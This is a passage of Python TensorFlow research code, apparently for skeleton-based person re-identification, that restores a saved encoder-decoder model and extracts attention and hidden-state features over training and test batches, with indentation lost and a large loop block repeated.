t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'c':
X.append(t2)
elif type == 'ch':
t3.extend(t2)
X.append(t3)
elif type == 'o':
X.append(t1)
elif type == 'oc':
t1.extend(t2)
X.append(t1)
elif type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
X.append(att_op)
else:
att_batch.append(att_op)
# else:
# att_batch = np.array(att_batch)
# c_vec = sess.run([contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
# X.append(c_vec)
else:
X.extend(att_op.tolist())
# for index in range(en_outputs.shape[0]):
# t1 = np.reshape(en_outputs[index], [-1]).tolist()
# if use_attention and AGEs:
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# # if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# att_batch.append(att_op)
# att_batch = np.array(att_batch)
# _, c_loss, c_vec = sess.run([C_train_op, C_loss, contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o + f_o_bw
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
X.append(f_o)
else:
X.extend(f_o.tolist())
elif type == 'attc':
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
att_op = np.reshape(att_op, [-1]).tolist()
att_op.extend(t2)
X.append(att_op)
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
X.extend(c_vec)
pred = pred.tolist()
for index, i in enumerate(pred):
pred[index].reverse()
pred = np.array(pred)
# en_outputs, en_c, en_h, en_c_1, en_h_1, pred_2 = sess.run(
# [encoder_output, encoder_c, encoder_h, encoder_c_1, encoder_h_1, predictions],
# {input_data: pred,
# targets: this_targets,
# lr: learning_rate,
# target_sequence_length: [time_steps] * batch_size,
# source_sequence_length: [time_steps] * batch_size,
# keep_prob: 0.5})
# for index in range(en_outputs.shape[0]):
# t1 = np.reshape(en_outputs[index], [-1]).tolist()
# t2 = np.reshape(en_c[index], [-1]).tolist()
# t3 = np.reshape(en_h[index], [-1]).tolist()
# t4 = np.reshape(en_c_1[index], [-1]).tolist()
# t5 = np.reshape(en_h_1[index], [-1]).tolist()
# if type == 'c':
# X_pred.append(t2)
# elif type == 'ch':
# t3.extend(t2)
# X_pred.append(t3)
# elif type == 'o':
# X_pred.append(t1)
# elif type == 'oc':
# t1.extend(t2)
# X_pred.append(t1)
# elif type == 'att':
# if use_attention and AGEs:
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# X_pred.append(att_op)
# else:
# X_pred.extend(att_op.tolist())
# else:
# f_o = en_outputs[index, :, :]
# # if Bi_LSTM:
# # f_o_bw = encoder_outputs_bw[index, :, :]
# # f_o = f_o + f_o_bw
# if manner == 'sc':
# f_o = np.reshape(f_o, [-1]).tolist()
# X_pred.append(f_o)
# else:
# X_pred.extend(f_o.tolist())
# elif type == 'attc':
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# att_op = np.reshape(att_op, [-1]).tolist()
# att_op.extend(t2)
# X_pred.append(att_op)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
y.extend([k] * batch_size)
# C_y.extend([k] * batch_size)
else:
y.extend([k] * batch_size * time_steps)
# exit(1)
for k, v in t_ids_:
flag = 0
if len(v) == 0:
continue
if len(v) < batch_size:
flag = batch_size - len(v)
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = t_input_data[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
this_targets = t_targets[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run([encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history, attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
t_C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if flag > 0:
en_outputs = en_outputs[:-flag]
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
# if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# t_X.append(att_op)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
t_X.append(att_op)
else:
att_batch.append(att_op)
# att_batch = np.array(att_batch)
# c_vec = sess.run([contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
# t_X.append(c_vec)
else:
t_X.extend(att_op.tolist())
t_X_att.append(weights)
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o_bw + f_o
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
t_X.append(f_o)
else:
t_X.extend(f_o.tolist())
elif type == 'attc':
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
att_op = np.reshape(att_op, [-1]).tolist()
att_op.extend(t2)
t_X.append(att_op)
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
t_X.extend(c_vec)
pred = pred.tolist()
for index, i in enumerate(pred):
pred[index].reverse()
pred = np.array(pred)
# en_outputs, en_c, en_h, en_c_1, en_h_1, pred_2 = sess.run(
# [encoder_output, encoder_c, encoder_h, encoder_c_1, encoder_h_1, predictions],
# {input_data: pred,
# targets: this_targets,
# lr: learning_rate,
# target_sequence_length: [time_steps] * batch_size,
# source_sequence_length: [time_steps] * batch_size,
# keep_prob: 0.5})
# for index in range(en_outputs.shape[0]):
# t1 = np.reshape(en_outputs[index], [-1]).tolist()
# t2 = np.reshape(en_c[index], [-1]).tolist()
# t3 = np.reshape(en_h[index], [-1]).tolist()
# t4 = np.reshape(en_c_1[index], [-1]).tolist()
# t5 = np.reshape(en_h_1[index], [-1]).tolist()
# if type == 'att':
# if use_attention and AGEs:
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# t_X_pred.append(att_op)
# else:
# t_X_pred.extend(att_op.tolist())
# else:
# f_o = en_outputs[index, :, :]
# if manner == 'sc':
# f_o = np.reshape(f_o, [-1]).tolist()
# t_X_pred.append(f_o)
# else:
# t_X_pred.extend(f_o.tolist())
# elif type == 'attc':
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# att_op = np.reshape(att_op, [-1]).tolist()
# att_op.extend(t2)
# t_X_pred.append(att_op)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
t_y.extend([k] * (batch_size - flag))
# t_C_y.extend([k] * (batch_size - flag))
else:
t_y.extend([k] * (batch_size - flag) * time_steps)
if dataset == 'IAS':
for k, v in t_2_ids_:
flag = 0
if len(v) == 0:
continue
if len(v) < batch_size:
flag = batch_size - len(v)
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = t_2_input_data[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
this_targets = t_2_targets[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
t_2_C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if flag > 0:
en_outputs = en_outputs[:-flag]
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
t_2_X.append(att_op)
else:
att_batch.append(att_op)
# att_batch = np.array(att_batch)
# c_vec = sess.run([contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
# t_2_X.append(c_vec)
else:
t_2_X.extend(att_op.tolist())
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o_bw + f_o
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
t_2_X.append(f_o)
else:
t_2_X.extend(f_o.tolist())
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
t_2_X.extend(c_vec)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
t_2_y.extend([k] * (batch_size - flag))
# t_2_C_y.extend([k] * (batch_size - flag))
else:
t_2_y.extend([k] * (batch_size - flag) * time_steps)
X_0 = np.array(X)
y_0 = np.array(y)
X_pred_0 = np.array(X_pred)
t_X_pred_0 = np.array(t_X_pred)
from sklearn.preprocessing import label_binarize
ids_keys = sorted(list(ids.keys()))
t_ids_keys = sorted(list(t_ids.keys()))
classes = [i for i in ids_keys]
t_classes = [i for i in t_ids_keys]
t_y = label_binarize(t_y, classes=t_classes)
if dataset == 'IAS':
t_2_ids_keys = sorted(list(t_2_ids.keys()))
t_2_classes = [i for i in t_2_ids_keys]
t_2_y = label_binarize(t_2_y, classes=t_2_classes)
t_2_y_0 = t_2_y
t_2_X_0 = t_2_X
t_y = np.array(t_y)
if C_reid == '1':
t_C_X = np.array(t_C_X)
else:
t_X = np.array(t_X)
t_y_0 = t_y
t_X_0 = t_X
# checkpoint 1
_targets = np.concatenate((_input_data[1:, :, :], _input_data[-1, :, :].reshape([1, time_steps, series_length])),
axis=0)
loaded_graph = tf.Graph()
with tf.Session(graph=loaded_graph, config=config) as sess:
loader = tf.train.import_meta_graph(checkpoint_1 + '.meta')
loader.restore(sess, checkpoint)
input_data = loaded_graph.get_tensor_by_name('inputs:0')
targets = loaded_graph.get_tensor_by_name('targets:0')
if Frozen == '1':
contrast_v = loaded_graph.get_tensor_by_name('add_16:0')
C_lr = loaded_graph.get_tensor_by_name('learning_rate_1:0')
C_input = loaded_graph.get_tensor_by_name('C_inptuiut:0')
else:
contrast_v = loaded_graph.get_tensor_by_name("add_2:0")
C_lr = loaded_graph.get_tensor_by_name('learning_rate_1:0')
if Bi_LSTM:
encoder_output = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/transpose_1:0')
encoder_c_1 = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_3:0')
encoder_h_1 = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_4:0')
encoder_c = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_5:0')
encoder_h = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_6:0')
encoder_output_bw = loaded_graph.get_tensor_by_name('ReverseSequence: 0')
encoder_c_1_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_3:0')
encoder_h_1_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_4:0')
encoder_c_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_5:0')
encoder_h_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_6:0')
predictions = loaded_graph.get_tensor_by_name('predictions:0')
else:
encoder_output = loaded_graph.get_tensor_by_name('rnn/transpose_1:0')
encoder_c_1 = loaded_graph.get_tensor_by_name('rnn/while/Exit_3:0')
encoder_h_1 = loaded_graph.get_tensor_by_name('rnn/while/Exit_4:0')
encoder_c = loaded_graph.get_tensor_by_name('rnn/while/Exit_5:0')
encoder_h = loaded_graph.get_tensor_by_name('rnn/while/Exit_6:0')
predictions = loaded_graph.get_tensor_by_name('predictions:0')
# train_output = loaded_graph.get_tensor_by_name('train_output:0')
if use_attention:
alignment_history = loaded_graph.get_tensor_by_name('train_attention_matrix:0')
# train_attention_matrix = loaded_graph.get_tensor_by_name('train_attention_matrix:0')
attention_state = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_12:0')
attention_weights = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_8:0')
alignment = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_10:0')
lr = loaded_graph.get_tensor_by_name('learning_rate:0')
keep_prob = loaded_graph.get_tensor_by_name('keep_prob:0')
source_sequence_length = loaded_graph.get_tensor_by_name('source_sequence_length:0')
target_sequence_length = loaded_graph.get_tensor_by_name('target_sequence_length:0')
X = []
C_X = []
X_all_op = []
X_final_op = []
X_final_c = []
X_final_h = []
X_final_c1 = []
X_final_h1 = []
X_final_ch = []
X_final_ch1 = []
y = []
C_y = []
X_pred = []
t_X = []
t_C_X = []
t_y = []
t_C_y = []
t_2_X = []
t_2_C_X = []
t_2_y = []
t_2_C_y = []
t_X_pred = []
t_X_att = []
# print(t_ids)
# print(test_attention)
ids_ = sorted(ids.items(), key=lambda item:item[0])
t_ids_ = sorted(t_ids.items(), key=lambda item: item[0])
if dataset == 'IAS':
t_2_ids_ = sorted(t_2_ids.items(), key=lambda item: item[0])
# print(ids_)
# exit(1)
for k, v in ids_:
if len(v) == 0:
print(k)
continue
if len(v) < batch_size:
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = _input_data[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
this_targets = _targets[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run([encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history, attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'c':
X.append(t2)
elif type == 'ch':
t3.extend(t2)
X.append(t3)
elif type == 'o':
X.append(t1)
elif type == 'oc':
t1.extend(t2)
X.append(t1)
elif type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
X.append(att_op)
else:
att_batch.append(att_op)
# else:
# att_batch = np.array(att_batch)
# c_vec = sess.run([contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
# X.append(c_vec)
else:
X.extend(att_op.tolist())
# for index in range(en_outputs.shape[0]):
# t1 = np.reshape(en_outputs[index], [-1]).tolist()
# if use_attention and AGEs:
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# # if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# att_batch.append(att_op)
# att_batch = np.array(att_batch)
# _, c_loss, c_vec = sess.run([C_train_op, C_loss, contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o + f_o_bw
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
X.append(f_o)
else:
X.extend(f_o.tolist())
elif type == 'attc':
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
att_op = np.reshape(att_op, [-1]).tolist()
att_op.extend(t2)
X.append(att_op)
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
X.extend(c_vec)
pred = pred.tolist()
for index, i in enumerate(pred):
pred[index].reverse()
pred = np.array(pred)
# en_outputs, en_c, en_h, en_c_1, en_h_1, pred_2 = sess.run(
# [encoder_output, encoder_c, encoder_h, encoder_c_1, encoder_h_1, predictions],
# {input_data: pred,
# targets: this_targets,
# lr: learning_rate,
# target_sequence_length: [time_steps] * batch_size,
# source_sequence_length: [time_steps] * batch_size,
# keep_prob: 0.5})
# for index in range(en_outputs.shape[0]):
# t1 = np.reshape(en_outputs[index], [-1]).tolist()
# t2 = np.reshape(en_c[index], [-1]).tolist()
# t3 = np.reshape(en_h[index], [-1]).tolist()
# t4 = np.reshape(en_c_1[index], [-1]).tolist()
# t5 = np.reshape(en_h_1[index], [-1]).tolist()
# if type == 'c':
# X_pred.append(t2)
# elif type == 'ch':
# t3.extend(t2)
# X_pred.append(t3)
# elif type == 'o':
# X_pred.append(t1)
# elif type == 'oc':
# t1.extend(t2)
# X_pred.append(t1)
# elif type == 'att':
# if use_attention and AGEs:
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# X_pred.append(att_op)
# else:
# X_pred.extend(att_op.tolist())
# else:
# f_o = en_outputs[index, :, :]
# # if Bi_LSTM:
# # f_o_bw = encoder_outputs_bw[index, :, :]
# # f_o = f_o + f_o_bw
# if manner == 'sc':
# f_o = np.reshape(f_o, [-1]).tolist()
# X_pred.append(f_o)
# else:
# X_pred.extend(f_o.tolist())
# elif type == 'attc':
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# att_op = np.reshape(att_op, [-1]).tolist()
# att_op.extend(t2)
# X_pred.append(att_op)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
y.extend([k] * batch_size)
# C_y.extend([k] * batch_size)
else:
y.extend([k] * batch_size * time_steps)
# exit(1)
for k, v in t_ids_:
flag = 0
if len(v) == 0:
continue
if len(v) < batch_size:
flag = batch_size - len(v)
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = t_input_data[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
this_targets = t_targets[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run([encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history, attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
t_C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if flag > 0:
en_outputs = en_outputs[:-flag]
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
# if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# t_X.append(att_op)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
t_X.append(att_op)
else:
att_batch.append(att_op)
# att_batch = np.array(att_batch)
# c_vec = sess.run([contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
# t_X.append(c_vec)
else:
t_X.extend(att_op.tolist())
t_X_att.append(weights)
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o_bw + f_o
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
t_X.append(f_o)
else:
t_X.extend(f_o.tolist())
elif type == 'attc':
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
att_op = np.reshape(att_op, [-1]).tolist()
att_op.extend(t2)
t_X.append(att_op)
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
t_X.extend(c_vec)
pred = pred.tolist()
for index, i in enumerate(pred):
pred[index].reverse()
pred = np.array(pred)
# en_outputs, en_c, en_h, en_c_1, en_h_1, pred_2 = sess.run(
# [encoder_output, encoder_c, encoder_h, encoder_c_1, encoder_h_1, predictions],
# {input_data: pred,
# targets: this_targets,
# lr: learning_rate,
# target_sequence_length: [time_steps] * batch_size,
# source_sequence_length: [time_steps] * batch_size,
# keep_prob: 0.5})
# for index in range(en_outputs.shape[0]):
# t1 = np.reshape(en_outputs[index], [-1]).tolist()
# t2 = np.reshape(en_c[index], [-1]).tolist()
# t3 = np.reshape(en_h[index], [-1]).tolist()
# t4 = np.reshape(en_c_1[index], [-1]).tolist()
# t5 = np.reshape(en_h_1[index], [-1]).tolist()
# if type == 'att':
# if use_attention and AGEs:
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# t_X_pred.append(att_op)
# else:
# t_X_pred.extend(att_op.tolist())
# else:
# f_o = en_outputs[index, :, :]
# if manner == 'sc':
# f_o = np.reshape(f_o, [-1]).tolist()
# t_X_pred.append(f_o)
# else:
# t_X_pred.extend(f_o.tolist())
# elif type == 'attc':
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# att_op = np.reshape(att_op, [-1]).tolist()
# att_op.extend(t2)
# t_X_pred.append(att_op)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
t_y.extend([k] * (batch_size - flag))
# t_C_y.extend([k] * (batch_size - flag))
else:
t_y.extend([k] * (batch_size - flag) * time_steps)
if dataset == 'IAS':
for k, v in t_2_ids_:
flag = 0
if len(v) == 0:
continue
if len(v) < batch_size:
flag = batch_size - len(v)
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = t_2_input_data[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
this_targets = t_2_targets[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
t_2_C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
